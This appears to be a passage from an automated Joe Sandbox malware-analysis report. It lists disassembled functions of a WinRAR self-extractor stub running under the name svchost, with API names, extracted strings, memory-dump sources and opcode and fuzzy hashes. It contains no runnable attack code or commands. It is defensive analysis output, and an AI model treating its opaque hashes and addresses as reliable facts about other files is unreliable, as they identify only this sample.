                                      • Instruction Fuzzy Hash: 3042B062B08B82C6EA10DF65E4441BD73B1EB857A4F505232EE5C5BAEADF7CE585C300

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Dialog$CloseConcurrency::cancel_current_taskItemOpenText
                                      • String ID: GETPASSWORD1$Software\WinRAR SFX
                                      • API String ID: 2036574139-1315819833
                                      • Opcode ID: ce9535df625cb818cf6f561ea6461aa7de3d19bdf8f7d60cadf61c6e5d574941
                                      • Instruction ID: 155b66f543e1a58d806277110c6b7a9506d5ab950e33ece4e8d17d425eeae728
                                      • Opcode Fuzzy Hash: ce9535df625cb818cf6f561ea6461aa7de3d19bdf8f7d60cadf61c6e5d574941
                                      • Instruction Fuzzy Hash: 83C18E62F19B82C6EB00CF74D4852BD33B2AB857A8F005231DE5D6E79ADE38E549C344
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: __tmp_reference_source_
                                      • API String ID: 3668304517-685763994
                                      • Opcode ID: f33f3b11d562c22e2209c7bdf06c98319fa5e61671820c2abe75737d61782696
                                      • Instruction ID: bf4eece2e13f62eb7c517a1b2f225f5b9246b76ca2d35ff5096a8201ea348ed6
                                      • Opcode Fuzzy Hash: f33f3b11d562c22e2209c7bdf06c98319fa5e61671820c2abe75737d61782696
                                      • Instruction Fuzzy Hash: E9D28B62A086C6C6EA64CF25E1543BE77F1EB85784F404136DE9D8B6AADF7CE484C700

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                      • String ID:
                                      • API String ID: 474548282-0
                                      • Opcode ID: add9c535fcd1950245e6fdf19927f21eb7d0f95099c43ef1d4d4b7bb08033897
                                      • Instruction ID: d3dc41c8a84e4bf4e9f0658ff37f3b30dd9d9a459541012a23ad1e11f7d7cf88
                                      • Opcode Fuzzy Hash: add9c535fcd1950245e6fdf19927f21eb7d0f95099c43ef1d4d4b7bb08033897
                                      • Instruction Fuzzy Hash: 40519D62A09A86C6EA109F28E44127D73B1FB857A4F505331EEBD8A6D9DF3CE584C700

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3536497005-0
                                      • Opcode ID: cf4cb9844ba2689985b4c0fb221ba14bdc6572bfc4fdd0263b288aa5301d0f13
                                      • Instruction ID: fa834eaa722d1a92a97f800d2b89033f5b8f6b4506838156c7121468a1ce19f8
                                      • Opcode Fuzzy Hash: cf4cb9844ba2689985b4c0fb221ba14bdc6572bfc4fdd0263b288aa5301d0f13
                                      • Instruction Fuzzy Hash: 1F61D166E1878185E7208F29E40037E77F1FB857A8F101329DEA94BAD9DF3DD5948740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: CMT
                                      • API String ID: 3668304517-2756464174
                                      • Opcode ID: 4dae98603705b2e05ebd5705bf8a6d0eaefde81177943c0740de6c7f50eb1749
                                      • Instruction ID: a79d0eb5f7060a9894341608d87ada1040850af9eec80f218470c36c36aaf027
                                      • Opcode Fuzzy Hash: 4dae98603705b2e05ebd5705bf8a6d0eaefde81177943c0740de6c7f50eb1749
                                      • Instruction Fuzzy Hash: 9C427662B086829BEB289F78C1502FD77F1EB51348F400136DF1E9BA96DF78A558CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 4d2fc60303526d1a9509bf2dff79ab5e03f0a21f60de4acd2949a1b312f8efb9
                                      • Instruction ID: 51f3709fb1b7edb459e3579728519509e0ebfce4dd473b28b35562caf5f338f6
                                      • Opcode Fuzzy Hash: 4d2fc60303526d1a9509bf2dff79ab5e03f0a21f60de4acd2949a1b312f8efb9
                                      • Instruction Fuzzy Hash: B7629622B08686DBFA28AE66D5543FD33F1AB45788F441432DE4EDBB96DE7CE4448304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1017591355-0
                                      • Opcode ID: f0fab94e89f8dfe17744a802f3d8cdb2a92c95cad9f6bc32b347d0c21958dadd
                                      • Instruction ID: 7b5cd1ce68dcaec0c06f9905d00169bf6df631fe30b540e5b44521ba4c11659f
                                      • Opcode Fuzzy Hash: f0fab94e89f8dfe17744a802f3d8cdb2a92c95cad9f6bc32b347d0c21958dadd
                                      • Instruction Fuzzy Hash: 2361F552E1C68FC1FAA49E66841527A72F1AF85BD4F144131EE4D8FBDEEE7CE4808200
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                      • API String ID: 3629253777-3268106645
                                      • Opcode ID: 3e049898a92d82d0d579073836632aed0c898a3fd36fc283c44cccd5c02f0299
                                      • Instruction ID: ffb9cdaafcb189fc4e8ef8702d4af02d864e5ee9fb98c3ec3245d0c7c9b04fc8
                                      • Opcode Fuzzy Hash: 3e049898a92d82d0d579073836632aed0c898a3fd36fc283c44cccd5c02f0299
                                      • Instruction Fuzzy Hash: AB62AC62A19A8AC1EB10DF28C5582BD33B5FB91788F814132DE5D8B6D9EF3CE945C340

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                      • String ID: .exe$.inf$Install$p
                                      • API String ID: 1054546013-3607691742
                                      • Opcode ID: 8fb8fbb352845074909f2ec412d94fe383064ff8ccd775e8df769509cabf2452
                                      • Instruction ID: 24b5a2008189671d35ff245ab57018034e195d83de532fb766e029c24810e8f1
                                      • Opcode Fuzzy Hash: 8fb8fbb352845074909f2ec412d94fe383064ff8ccd775e8df769509cabf2452
                                      • Instruction Fuzzy Hash: 41C17562E08A42D5FB50DF25D9412BD37F1AF89B84F144136DE0D9EAA5EF38E8958340

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID:
                                      • API String ID: 3569833718-0
                                      • Opcode ID: 94ed308b943ff656ca038665f94074f57181f8bfd44f591ba4e87b38ee4d187b
                                      • Instruction ID: c26093d1fd1bc1bac198294a24a26ddc27d1983c72944ee754da1e8fce5a19f8
                                      • Opcode Fuzzy Hash: 94ed308b943ff656ca038665f94074f57181f8bfd44f591ba4e87b38ee4d187b
                                      • Instruction Fuzzy Hash: 9841AF31B14646C6F3148F61E914BAE37B0FB4AB88F441535ED4A4BB95CF7DE8098B40

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                      • String ID: H
                                      • API String ID: 948315288-2852464175
                                      • Opcode ID: 7fd1c4134b29a5f5a3c6f87d77d20aaf4a09e7ea0e27b3a11035ada92dbf2ae2
                                      • Instruction ID: fef8329191116685efd00d91366ce14e2c1d432cf2f5a20b100e1c80bf0dceef
                                      • Opcode Fuzzy Hash: 7fd1c4134b29a5f5a3c6f87d77d20aaf4a09e7ea0e27b3a11035ada92dbf2ae2
                                      • Instruction Fuzzy Hash: D5910562A15B62CAEB44CFA5D8446B833F1BB08B98F494535DE0E9BB54EF7CE449C340

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseCreateValue_invalid_parameter_noinfo_noreturn
                                      • String ID: Software\WinRAR SFX
                                      • API String ID: 207320342-754673328
                                      • Opcode ID: ba30d486b2100a471be5d6af214167eeff464933188ca99c290aca02269e1fac
                                      • Instruction ID: 8a2fe57eecbea8a21d58a596671e8e7c9be7252cab81fbf644e96ea5cbe50927
                                      • Opcode Fuzzy Hash: ba30d486b2100a471be5d6af214167eeff464933188ca99c290aca02269e1fac
                                      • Instruction Fuzzy Hash: 49416E72A08A42D9EB10DF25E8806AD33F4FB88798F415235EE5C8AB99EF7CD554C700

                                      Control-flow Graph

                                      control_flow_graph 3082 7ff669acf540-7ff669acf56b 3083 7ff669acf570-7ff669acf5a6 SetEnvironmentVariableW call 7ff669abc968 3082->3083 3084 7ff669acf56d 3082->3084 3086 7ff669acf5ab-7ff669acf5ad 3083->3086 3084->3083 3087 7ff669acf5af 3086->3087 3088 7ff669acf5fa-7ff669acf602 3086->3088 3089 7ff669acf5b3-7ff669acf5bb 3087->3089 3090 7ff669acf604-7ff669acf61a 3088->3090 3091 7ff669acf636-7ff669acf651 call 7ff669ad1d90 3088->3091 3093 7ff669acf5c0-7ff669acf5cb call 7ff669abcce8 3089->3093 3094 7ff669acf5bd 3089->3094 3095 7ff669acf631 call 7ff669ad1c7c 3090->3095 3096 7ff669acf61c-7ff669acf62f 3090->3096 3104 7ff669acf5da-7ff669acf5df 3093->3104 3105 7ff669acf5cd-7ff669acf5d8 3093->3105 3094->3093 3095->3091 3096->3095 3097 7ff669acf652-7ff669acf657 call 7ff669ad6854 3096->3097 3106 7ff669acf5e4-7ff669acf5f9 SetEnvironmentVariableW 3104->3106 3107 7ff669acf5e1 3104->3107 3105->3089 3106->3088 3107->3106
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 3540648995-3493335439
                                      • Opcode ID: d145f836bdf2eab021226228e8f2a3c48b4484dd07b48e2350f764278c8bd62e
                                      • Instruction ID: 59e7c865b86639716eb9563ce25131ad006b43a6091dd6768e87fb41beac5f28
                                      • Opcode Fuzzy Hash: d145f836bdf2eab021226228e8f2a3c48b4484dd07b48e2350f764278c8bd62e
                                      • Instruction Fuzzy Hash: A8317C62E14A56C4EB00CF69E4801BD33F1EB88B98F144636DE5DAB6A9DF38E085C340

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                      • String ID: ]
                                      • API String ID: 3561356813-3352871620
                                      • Opcode ID: 7a069afb3f149c8acc1719c281d8d8159f5c8f5b95f9bfb414c6076793044167
                                      • Instruction ID: 1bb763a979649f071d7378b344aa93271ffd06291de572430c36d30649e49be9
                                      • Opcode Fuzzy Hash: 7a069afb3f149c8acc1719c281d8d8159f5c8f5b95f9bfb414c6076793044167
                                      • Instruction Fuzzy Hash: F7114621B09606C2FB559F12965527DB3F2AF8DBD4F484034DD4D9FB95EE2CE8058B40

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 9939f4b74b23a281263d85086807279f5d1affe8b5170467d6b3b13192338d18
                                      • Instruction ID: 91ec274154bb18dd71553426aaa27b685e6ac19a3684e8d5532ba598e8397ece
                                      • Opcode Fuzzy Hash: 9939f4b74b23a281263d85086807279f5d1affe8b5170467d6b3b13192338d18
                                      • Instruction Fuzzy Hash: 5FF03722A28942C2FB509F20E994A3B3271FF99B04F845030EE4E89954DF2CD509CB40
                                      APIs
                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF669AB7EEA,?,?,00000000,00007FF669AC31A1), ref: 00007FF669AB20CF
                                      • WriteFile.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF669AB7EEA,?,?,00000000,00007FF669AC31A1), ref: 00007FF669AB211B
                                      • WriteFile.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF669AB7EEA,?,?,00000000,00007FF669AC31A1), ref: 00007FF669AB214A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: dd5c6d1cf7f5e4687dc538402f4c2870435eeff337d651548b9ced4ab7383243
                                      • Instruction ID: bd75f3bdc87c9b9e3d19117862b66df124b8178483be911bfd4253519937c22f
                                      • Opcode Fuzzy Hash: dd5c6d1cf7f5e4687dc538402f4c2870435eeff337d651548b9ced4ab7383243
                                      • Instruction Fuzzy Hash: D951D322A1868AD2EA54CF25E54437A73B0FF94794F005136EF4D8BA99DF3CE49AC700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                      • String ID:
                                      • API String ID: 2912839123-0
                                      • Opcode ID: d389d03b20cbad5d38bb32427598483523328e64162a3de504ffe4c209817687
                                      • Instruction ID: a83535e490a2515d173de889ca08b530aac91da9876d81a3420801144ea63b08
                                      • Opcode Fuzzy Hash: d389d03b20cbad5d38bb32427598483523328e64162a3de504ffe4c209817687
                                      • Instruction Fuzzy Hash: DC518FA2F14642C5EF009FA9D4453BC33B2AF457A8F500636DE2C9EBD6DF78D5449240
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2359106489-0
                                      • Opcode ID: 384ed84f5128f0527bc2ee8d99e8da7590fd717a49ec05e9b42326e41c3cfe4e
                                      • Instruction ID: b99f048248566d3f7880f0ee38bd53aa8e9097dbfeaf020a8460397fc38560be
                                      • Opcode Fuzzy Hash: 384ed84f5128f0527bc2ee8d99e8da7590fd717a49ec05e9b42326e41c3cfe4e
                                      • Instruction Fuzzy Hash: FB31A422E1C686C1EA609F25915527D72F1FF98790F504632EE9DCB699DF3CD9428600
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: 3c6fc8b0f138e048470a0679d010b9966860626a5f3f01854496960ae9183c48
                                      • Instruction ID: ae7426e889bc3db09ea8d6cc8b45d8652c369f6f77aa28664374ad8f8aaad61e
                                      • Opcode Fuzzy Hash: 3c6fc8b0f138e048470a0679d010b9966860626a5f3f01854496960ae9183c48
